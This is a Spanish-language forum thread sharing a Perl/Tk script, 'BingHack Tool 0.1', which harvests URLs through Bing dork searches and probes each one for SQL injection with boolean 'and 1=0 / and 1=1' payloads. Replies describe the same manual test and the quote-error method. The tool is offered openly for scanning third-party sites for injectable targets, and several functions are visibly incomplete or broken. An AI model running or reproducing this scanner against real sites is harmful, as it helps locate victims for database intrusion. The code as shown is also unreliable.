Autor
|
Tema: [Perl Tk] BingHack Tool 0.1 (Leído 5,261 veces)
|
BigBear
Desconectado
Mensajes: 545
|
Version Tk de un script en Perl para buscar paginas vulnerables a SQLi usando Bing. Una imagen El codigo #!usr/bin/perl #BingHack Tool 0.1 #Version Tk #Coded By Doddy H use Tk; use LWP::UserAgent; my $nave = LWP::UserAgent->new; $nave->agent( "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12" ); $nave->timeout(5); my $color_fondo = "black"; my $color_texto = "green"; if ( $^O eq 'MSWin32' ) { use Win32::Console; Win32::Console::Free(); } my $hj = MainWindow->new( -background => $color_fondo, -foreground => $color_texto ); $hj->geometry("600x285+20+20"); $hj->resizable( 0, 0 ); $hj->title("BingHack Tool 0.1"); $hj->Label( -text => "Dork : ", -font => "Impact1", -background => $color_fondo, -foreground => $color_texto )->place( -x => 18, -y => 22 ); my $dork = $hj->Entry( -width => 30, -background => $color_fondo, -foreground => $color_texto )->place( -x => 68, -y => 26 ); $hj->Label( -text => "Pages : ", -font => "Impact1", -background => $color_fondo, -foreground => $color_texto )->place( -x => 270, -y => 22 ); my $pages = $hj->Entry( -width => 10, -background => $color_fondo, -foreground => $color_texto )->place( -x => 335, -y => 26 ); $hj->Button( -text => "Search", -width => 10, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto, -command => \&search )->place( -x => 420, -y => 26 ); $hj->Button( -text => "Logs", -width => 10, -background => $color_fondo, -foreground => $color_texto, -activebackground => $color_texto, -command => \&logs )->place( -x => 495, -y => 26 ); $hj->Label( -text => "Links Found", -font => "Impact", -background => $color_fondo, -foreground => $color_texto )->place( -x => 110, -y => 80 ); my $links = $hj->Listbox( -width => 40, -height => 10, -background => $color_fondo, -foreground => $color_texto )->place( -x => 30, -y => 120 ); $hj->Label( -text => "SQLi Found", -font => "Impact", -background => $color_fondo, -foreground => $color_texto )->place( -x => 390, -y => 80 ); my $founds = $hj->Listbox( -width => 40, -height => 10, -background => $color_fondo, -foreground => $color_texto )->place( -x => 310, -y => 120 ); MainLoop; sub search { $links->delete( "0.0", "end" ); $founds->delete( "0.0", "end" ); $hj->update; $hj->title("BingHack Tool 0.1 [+] Status : Searching"); my @urls = bing( $dork->get, $pages->get ); $hj->update; for (@urls) { $hj->update; $links->insert( "end", $_ ); } $hj->title("BingHack Tool 0.1 [+] Status : Scanning"); for my $pa (@urls) { $hj->update; sql($pa); } $hj->update; $hj->title("BingHack Tool 0.1"); } sub logs { my $file = "sql-logs.txt"; if ( -f $file ) { } else { $hj->Dialog( -title => "Error", -buttons => ["OK"], -text => "Logs not found", -background => $color_fondo, -foreground => $color_text, -activebackground => $color_text )->Show(); } } sub sql { my ( $pass1, $pass2 ) = ( "+", "--" ); my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 ); my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 ); unless ( $testar1 eq $testar2 ) { $founds->insert( "end", $page ); savefile( "sql-logs.txt", $page ); } } sub savefile { open( SAVE , ">>" . $_[0] ); } sub bing { my ( $a, $b ) = @_; for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) { $hj->update; my $code = toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages ); while ( $code =~ /<h3><a href="(.*?)"/mig ) { } } my @founds = repes( cortar(@founds) ); } sub repes { my @limpio; foreach $test (@_) { push @limpio, $test unless $repe{$test}++; } } sub cortar { my @nuevo; for (@_) { if ( $_ =~ /=/ ) { @tengo = split( "=", $_ ); push( @nuevo, @tengo[0] . "=" ); } else { } } } sub toma { return $nave->get( $_[0] )->content; } #The End ?
|
|
|
En línea
|
|
|
|
z3nth10n
Desconectado
Mensajes: 1.583
"Jack of all trades, master of none." - Zenthion
|
|
|
« Última modificación: 26 Mayo 2012, 16:18 pm por Seazoux »
|
En línea
|
⏩ Interesados hablad por Discord.
|
|
|
BigBear
Desconectado
Mensajes: 545
|
si leyeras bien el titulo te darias cuenta de que una version es para consola y otra es para Tk (version grafica).
|
|
|
En línea
|
|
|
|
Runex
Desconectado
Mensajes: 192
http://tutogramacion.blogspot.com
|
Aquí con tal de subir mensajes se aprovecha todo anda que.. Buen trabajo Doddy, aunque las webs que muestras en la imagen del BingHack no me aparecen como vulnerables si compruebo yo la vuln a mano :S. Un saludo
|
|
|
En línea
|
"No renunciaría al bambú. Nunca renuciaría a ti. No te compares con otros" "El me dijo: El bambú tenía un propósito diferente al del helecho, sin embargo eran necesarios y hacían del bosque un lugar hermoso".
|
|
|
BigBear
Desconectado
Mensajes: 545
|
gracias por el aviso runex voy a tener que mejorar la funcion sql() debido a que solo 3 urls de la imagen son realmente vulnerables.
|
|
|
En línea
|
|
|
|
Runex
Desconectado
Mensajes: 192
http://tutogramacion.blogspot.com
|
gracias por el aviso runex voy a tener que mejorar la funcion sql() debido a que solo 3 urls de la imagen son realmente vulnerables.
De nada Doddy, para eso estamos . Lo que hacía yo para comprobar la vulnerabilidad, era añadir a la url ésto: "noticias.php?id=1+and+1=1" si el código fuente de esa era igual al código fuente original y el código fuente de "noticias.php?id=1+and+1=0" es diferente de ambas, lo más probable es que sea vulnerable. Otra forma, la más conocida, le añades comillas al final de la url, y compruebas si en su código aparece la palabra Sql Error, o los típicos errores, ya sabes . Un saludo Runex
|
|
|
En línea
|
"No renunciaría al bambú. Nunca renuciaría a ti. No te compares con otros" "El me dijo: El bambú tenía un propósito diferente al del helecho, sin embargo eran necesarios y hacían del bosque un lugar hermoso".
|
|
|
BigBear
Desconectado
Mensajes: 545
|
la tecnica que use es la misma que dijiste sub sql { my ( $pass1, $pass2 ) = ( "+", "--" ); my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 ); my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 ); unless ( $testar1 eq $testar2 ) { $founds->insert( "end", $page ); savefile( "sql-logs.txt", $page ); } }
|
|
|
En línea
|
|
|
|
z3nth10n
Desconectado
Mensajes: 1.583
"Jack of all trades, master of none." - Zenthion
|
Perdona, y porque no lo subes todo en un mismo post? Por cierto, buen trabajo.
|
|
|
En línea
|
⏩ Interesados hablad por Discord.
|
|
|
BigBear
Desconectado
Mensajes: 545
|
lo hago en post diferentes para que quede mas ordenado debido a que en la version Tk siempre pongo una imagen del programa y en la version consola no.
|
|
|
En línea
|
|
|
|
s3tH
Desconectado
Mensajes: 55
|
Que tal amigo, me podria dar instruciones para instalar TK en windows, por k en los paquetes solo encuentro TKx, e intente instalar tcl, pero no puedo compilar con tk, saludos.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
[Perl] BingHack Tool 0.1
Scripting
|
BigBear
|
0
|
1,679
|
26 Mayo 2012, 16:02 pm
por BigBear
|
|
|
[PyQT4] BingHack Tool 0.1
Python
|
BigBear
|
1
|
2,118
|
3 Noviembre 2012, 15:45 pm
por Stakewinner00
|
|
|
[Java] BingHack Tool 0.1
Java
|
BigBear
|
0
|
1,539
|
13 Enero 2013, 03:39 am
por BigBear
|
|
|
[Delphi] BingHack Tool 0.1
Programación General
|
BigBear
|
0
|
1,739
|
31 Mayo 2013, 20:53 pm
por BigBear
|
|
|
[Python-Android] BingHack Tool 0.1
Python
|
BigBear
|
2
|
3,368
|
20 Septiembre 2013, 10:01 am
por fallout20xx
|
|